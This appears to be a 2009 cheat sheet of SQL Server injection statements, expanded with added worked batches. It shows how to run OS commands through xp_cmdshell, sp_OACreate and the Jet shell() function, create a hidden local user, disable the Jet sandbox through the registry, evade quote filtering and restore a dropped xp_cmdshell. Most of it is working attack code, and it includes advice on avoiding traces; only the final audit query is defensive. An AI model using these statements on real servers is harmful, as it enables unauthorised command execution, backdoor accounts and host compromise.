March 31, 2009

MS SQL Server injection statements

Executing CMD commands
exec master..xp_cmdshell 'net1 user zerosoul 123456 /add'

DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [E:\wwwroot\cmd.exe /c net1 user>E:\wwwroot\1.txt]
(sp_oacreate depends on odsole70.dll, and on SQL Server 2005+ the 'Ole Automation Procedures' option must be enabled first. The [bracketed] arguments are identifiers, which T-SQL accepts as parameter values in place of string literals, so the statement still works when single quotes are filtered; the redirect writes the command output under the web root so it can be fetched over HTTP.)
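
The same "execute CMD" step with the output kept inside the server and with the OLE error handling the one-liner above omits, added here as an example (not from the original post). It assumes xp_cmdshell is available and uses 'whoami' and C:\temp as illustrative stand-ins:

```sql
-- Added example, not from the original post. Assumes xp_cmdshell is enabled
-- (default on 2000, must be switched on with sp_configure on 2005+);
-- 'whoami' and C:\temp\whoami.txt are illustrative stand-ins.

-- 1) xp_cmdshell: INSERT ... EXEC captures stdout one row per line,
--    so nothing has to be written under the web root to read the result.
CREATE TABLE #out (line NVARCHAR(4000) NULL);
INSERT INTO #out EXEC master..xp_cmdshell 'whoami';
SELECT line FROM #out WHERE line IS NOT NULL;   -- xp_cmdshell emits a trailing NULL row
DROP TABLE #out;

-- 2) OLE Automation path. On SQL Server 2005+ the sp_OA* procedures are
--    off by default and must be enabled first.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;

DECLARE @obj INT, @hr INT, @src VARCHAR(255), @desc VARCHAR(255);
EXEC @hr = sp_OACreate 'WScript.Shell', @obj OUT;
IF @hr <> 0
BEGIN
    -- sp_OACreate fails when odsole70.dll cannot be loaded or the option is off;
    -- NULL as object token returns the error info for the batch.
    EXEC sp_OAGetErrorInfo NULL, @src OUT, @desc OUT;
    SELECT @hr AS hresult, @src AS source, @desc AS description;
    RETURN;
END
-- WScript.Shell.Run(strCommand, intWindowStyle, bWaitOnReturn): 0 = hidden window, 1 = wait for exit.
-- Run() returns no output, hence the redirect to a file.
EXEC @hr = sp_OAMethod @obj, 'Run', NULL, 'cmd.exe /c whoami > C:\temp\whoami.txt', 0, 1;
IF @hr <> 0
BEGIN
    EXEC sp_OAGetErrorInfo @obj, @src OUT, @desc OUT;
    SELECT @hr AS hresult, @src AS source, @desc AS description;
END
EXEC sp_OADestroy @obj;   -- release the COM object
```

Both paths run in the security context of the SQL Server service account, so whatever it can do on the host (create local users, write under the web root) the command can do too.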

Execution via the Jet sandbox

Enable sandbox-mode execution
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
(Per Microsoft KB 294698 the value means: 0 = sandbox disabled for all callers, 1 = sandbox enabled for non-Access applications, 2 = sandbox enabled for Access only, 3 = enabled everywhere. SQL Server is a non-Access caller, so if 1 does not let shell() run, write 0.)

Enable openrowset on 2005 (Ad Hoc Distributed Queries is off by default on 2005; the option does not exist on 2000)
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user zerosoul$ 123456 /add")')
(Any existing .mdb can serve as the database; shell() is a Jet expression-service function and runs as the SQL Server service account. The Jet 4.0 provider is 32-bit only, so this does not work on a 64-bit instance.)
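
The three sandbox steps above as one batch, with the checks that decide up front whether the Jet path can work at all, added here as an example (not from the original post). Registry key, database path and account name are the post's own; the redirect target c:\temp\jet.txt is illustrative:

```sql
-- Added example, not from the original post. Paths and the account name are
-- taken from the statements above; c:\temp\jet.txt is an illustrative target.

-- 0) Preconditions. Jet 4.0 is a 32-bit provider: a 64-bit instance cannot load it,
--    and the provider must be registered on the host.
SELECT SERVERPROPERTY('Edition') AS edition;   -- ends in "(64-bit)" -> the Jet path is out
EXEC master.dbo.sp_enum_oledb_providers;        -- Microsoft.Jet.OLEDB.4.0 must be listed

-- 1) Turn the Jet sandbox off for non-Access callers such as SQL Server.
--    Value meanings per Microsoft KB 294698: 0 = off for everyone, 1 = on for
--    non-Access apps, 2 = on for Access only, 3 = on for everyone.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE',
    'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 0;
-- read the value back to confirm the write took effect
EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
    'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode';

-- 2) Allow ad hoc OPENROWSET / OPENDATASOURCE (option introduced in 2005).
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE;

-- 3) Any readable .mdb works as the "database"; the post uses ias.mdb.
--    shell() returns nothing useful, so redirect the command output to a file
--    that can later be read back (e.g. with xp_cmdshell or over the web root).
SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0',
    ';database=c:\windows\system32\ias\ias.mdb',
    'SELECT shell("cmd.exe /c net user zerosoul$ 123456 /add > c:\temp\jet.txt")');
```

The edition check comes first because on a 64-bit server none of the later steps can succeed, and writing the registry value needlessly leaves an obvious trace.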

Restoring xp_cmdshell (depends on xpsql70.dll or xplog70.dll)

Restore when xp_cmdshell has been disabled

Restore when xp_cmdshell has been dropped
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

Restore when the function cannot be found in the library (xpsql70.dll is the SQL Server 7.0 library; on 2000 xp_cmdshell lives in xplog70.dll, so re-register against that)
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'
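
The three recovery cases above as one batch with the checks that tell them apart, added here as an example (not from the original post). It also covers the "disabled" case, which on SQL Server 2005+ is a server option rather than a missing procedure; the sys.configurations query needs 2005+, the rest works on 2000 as well:

```sql
-- Added example, not from the original post. Assumes sysadmin; 'xplog70.dll'
-- is the 2000/2005 library named above.

-- Is xp_cmdshell registered at all? Extended procedures are rows of xtype 'X' in master.
SELECT name, crdate
FROM master..sysobjects
WHERE xtype = 'X' AND name = 'xp_cmdshell';

-- Disabled case (2005+): present, but value_in_use = 0. Enabling is a config change.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE WITH OVERRIDE;

-- Dropped case, or registered against a dll that is not there any more:
-- re-register it. sp_addextendedproc fails if the name already exists,
-- hence the conditional drop first. (On 2005+ the sp_configure step above
-- is normally all that is needed; drop/re-add is the 2000-era fix.)
IF EXISTS (SELECT 1 FROM master..sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
    EXEC sp_dropextendedproc 'xp_cmdshell';
EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';

-- Verify. A dll that cannot be loaded, or one that does not export the
-- function, only surfaces as an error at first call.
EXEC master..xp_cmdshell 'ver';
```

Reading sysobjects before dropping matters because sp_dropextendedproc on a name that does not exist raises an error and, inside an injected batch, stops the rest from running.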

Listing directories (depends on xpstar.dll)
exec xp_dirtree 'D:\Microsoft SQL Server\MSSQL\',1,1; (keep the trailing 1,1: depth 1, and include files. Without a depth argument the entire tree is walked recursively, which on a large volume is slow and very noisy)
exec xp_subdirs 'c:\' (lists directories only, not files)

Listing extended stored procedures
EXEC sp_helpextendedproc;
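
A check from the other side of the table, added here as an example (not from the original post): one pass over the features the statements above rely on and over who can reach xp_cmdshell. It assumes SQL Server 2005+ catalog views:

```sql
-- Added example, not from the original post. Assumes SQL Server 2005+ (sys.* views).

-- Server options the techniques above depend on; value_in_use = 1 means live.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'Ad Hoc Distributed Queries', 'show advanced options')
ORDER BY name;

-- Extended procedures that did not ship with the product: a re-added xp_cmdshell
-- or a planted dll shows up here with is_ms_shipped = 0 and a recent create_date.
SELECT o.name, o.create_date, o.modify_date
FROM master.sys.objects AS o
WHERE o.type = 'X' AND o.is_ms_shipped = 0;

-- Principals granted EXECUTE on xp_cmdshell directly (sysadmin needs no grant).
SELECT dp.name AS grantee, p.permission_name, p.state_desc
FROM master.sys.database_permissions AS p
JOIN master.sys.database_principals AS dp
    ON dp.principal_id = p.grantee_principal_id
WHERE p.major_id = OBJECT_ID('master.dbo.xp_cmdshell');

-- Jet sandbox state on the host (0 or 2 = shell() allowed for SQL Server,
-- per Microsoft KB 294698); requires xp_regread, i.e. sysadmin.
EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
    'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode';
```

Run as a scheduled job, the first query alone catches every enablement step on this page, since each of them has to flip one of those four options.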
